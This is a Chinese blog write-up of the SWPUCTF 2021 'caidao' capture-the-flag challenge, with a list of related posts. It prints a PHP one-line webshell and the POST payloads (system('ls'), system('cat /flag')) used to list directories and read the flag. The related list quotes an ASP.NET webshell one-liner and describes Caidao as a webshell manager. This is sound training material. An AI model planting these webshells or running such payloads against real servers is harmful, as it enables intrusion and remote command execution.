NSSCTF | [SWPUCTF 2021 新生赛]caidao

最新推荐文章于 2024-06-20 18:31:22 发布
最新推荐文章于 2024-06-20 18:31:22 发布
阅读量197 收藏 4
点赞数 8
分类专栏: NSSCTF 文章标签: 安全 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_80946742/article/details/138698162
版权

打开题目,只有一个图片,图片中间是一个一句话木马的一部分,意思是服务器可以执行通过POST的请求方式传入参数为wllm的命令,那这就是典型的命令执行,当然,也可以使用蚁剑或者菜刀连接这个木马

一句话木马的详细介绍可以参考我的这篇文章

最新upload-labs文件上传漏洞靶场搭建安装,upload-labs Pass01-Pass20 二十关详解,靶场源码详解,upload-labs第一关到第二十关详解,一句话木马详细介绍-CSDN博客

@eval($_POST['wllm']);

我们首先使用命令执行来做一下这个题目

这里使用到的工具是HackBar

使用HackBar传入参数为wllm的ls命令,可以看到左上角有回显,展示了当前目录下的文件,说明命令有用

wllm=system('ls');

看不清的话,可以Ctrl+U查看网页源代码

然后返回根目录看看有什么

wllm=system('ls /');

可以直接看到flag文件

然后cat命令查看就能得到flag

wllm=system('cat /flag');

本题完。

Hackerdallas
关注
  • 8
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
caidao-20141213.zip
04-10
caidao-20141213.zip
caidao 一款不错的网站管理工具
06-02
一款不错的网站管理工具,可以方便的上传、下载文件到你的网站, 主程序的 hash 值如下: MD5:ac86066ffd58779f4c0db5030574b0cb SHA1:02c1725fa5865a4be0f4a040bfdbc4b30b628d8c
NSSCTF WEB 题解(一)
2301_81105268的博客
06-04 1139
题目提示:F12下发环境,打开网址,进入网页后点击F12查看源代码直接查找flag可以得到flag。
NSSCTFweb刷题记录
fivesheeptree的博客
07-12 321
如果$id等于"wllmNB"并且$json['x']等于"wllm",则将输出$flag的值。将json参数的值解码为,从而使得$json['x']的值等于"wllm"。通过POST方法传递的id参数的值,并将通过GET方法传递的json参数解码为关联数组。
NSSCTF——Web题目1
weixin_54055099的博客
08-25 1099
NSSCTF基础web题目的解题思路
NSSCTF刷题笔记web6——[SWPUCTF 2021 新生]caidao
qq_45692883的博客
01-18 510
题目也是非常的简洁明了,考点可能是菜刀的使用,所以稍微绕一下,用菜刀来get shell。直接输入网址以及密码和脚本格式,就可以获取shell。caidao是一款shell管理工具。
NSSCTF题库[SWPUCTF 2021 新生]+部分新生签到题
热门推荐
J1ng_Hong的博客
10-27 1万+
发现题目需要我们用php伪协议,并且需要前三位是php三个字母。此时我们上网搜索,发现了php://filter可以读取文件。在后面加上write=string.rot13/resource=flag即可。首先一进来就是源码代码审计,非常简单的绕过。其中string.rot13为字符串过滤器。
[SWPUCTF 2021 新生]caidao
2301_80358831的博客
04-18 363
[SWPUCTF 2021 新生]caidao 题目解析
[SWPUCTF] 2021新生之(NSSCTF)刷题记录 ①
Aluxian_的博客
04-17 1770
[SWPUCTF] 2021新生之(NSSCTF)刷题记录wp
[SWPUCTF 2021 新生]WEB刷题记录
m0_73239569的博客
11-13 198
从POST请求中获取名为'id'的变量值,并从GET请求中获取名为'json'的变量值。就可以输出名为'flag'的变量的值。按照要求格式,flag为:NSSCTF{We1c0me_t0_WLLMCTF_Th1s_1s_th3_G1ft}之后执行,得到flag:NSSCTF{b3431475-1ea5-46a1-bda1-b269bd451f46}之后告诉我们当'id'等于"wllmNB"且'json'数组中的'x'键对应的值为"wllm"打开之后,根据题目提示直接F12,在源码中搜索CTF得到flag。
caidao.rar_caidao web_webshell_入侵检测系统
09-15
web系统管理工具,用于入侵检测,中国开发者使用。
caidao:golang版本菜鸟级菜刀
05-16
菜鸟级golang菜刀 因为不想装java的环境......到当前目中cmd 执行 caidao.exe (windows) 上传见不得人的小文件 .. 这里就不讨论怎么能通过x洞上传小文件 上传文件 目前我就写了php的版本 cus.php (主要文件) fi
caidao-20160622-www.maicaidao.com.rar
05-12
菜刀 / Caidao @ ...  ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["caidao"],"unsafe");%> 2)自己开发的脚本程序(Customize): 理论上支持所有动态脚本,只要正确与菜刀进
面试经验分享 | 24年6月某安全厂商HW面试经验
zkaqlaoniao的博客
06-17 599
也希望大家有什么护网相关的需求和建议都可以留在评论区,大家讨论下,嘿嘿嘿,希望大家伙都可以通过今年的护网面试。申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。反射型XSS:反射型XSS攻击是一次性的攻击,当受害者点击恶意链接url的时候,恶意代码会直接在受害者的主机上的浏览器执行。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。
MVC 框架安全
A526847的博客
06-17 614
举例来说,在“注入攻击”一章中,我们并没有使用 PHP 的 magic_quotes_gpc 作为一项 对抗 SQL 注入的防御方案,这是因为 magic_quotes_gpc 是有缺陷的,它并没有在正确的地方 解决问题。其次,对于一些常见的漏洞来说,由程序员一个个修补可能会出现遗漏,而在框架中统一 解决,有可能解决“遗漏”的问题。最后,在每个业务里修补安全漏洞,补丁的标准难以统一,而在框架中集中实施的安全方 案,可以使所有基于框架开发的业务都能受益,从安全方案的有效性来说,更容易把握。
企业防盗版,如何保障上网安全
最新发布
shenxinda_lu的博客
06-20 276
当需要访问互联网时,用户在隔离沙盒内进行操作,确保主机与互联网物理隔离,只有沙盒能够访问互联网,且沙盒与本机隔离。
揭秘网络安全攻防战
waitaikong_的博客
06-17 586
随着互联网的普及,网络安全成为企业和个人关注的焦点。网络安全不仅关系到个人隐私的保护,还影响到企业的商业机密和国家的主权安全。因此,了解和掌握网络安全攻防战的相关知识,对于构建稳固的网络防御体系至关重要。网络安全攻防战是一场没有硝烟的战争,它要求我们不仅要了解当前的攻防技术,还要预见未来可能出现的新威胁,并提前做好准备。通过不断的学习和实践,我们可以提高自己在这方面的知识和技能,为保护网络安全贡献力量。未来的攻击手段将更加多样化和复杂化,防御策略也需要不断地更新和升级以应对新的挑战。
caidao设计网怎么样
05-08
作为一个专业的设计创意网站,Caidao设计网向来备受业内人士和用户的好评。首先,它提供了丰富多样的设计类别,包括品牌设计、网站设计、平面设计、包装设计和视频设计等,并且每个设计类别下还有不同的设计主题和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值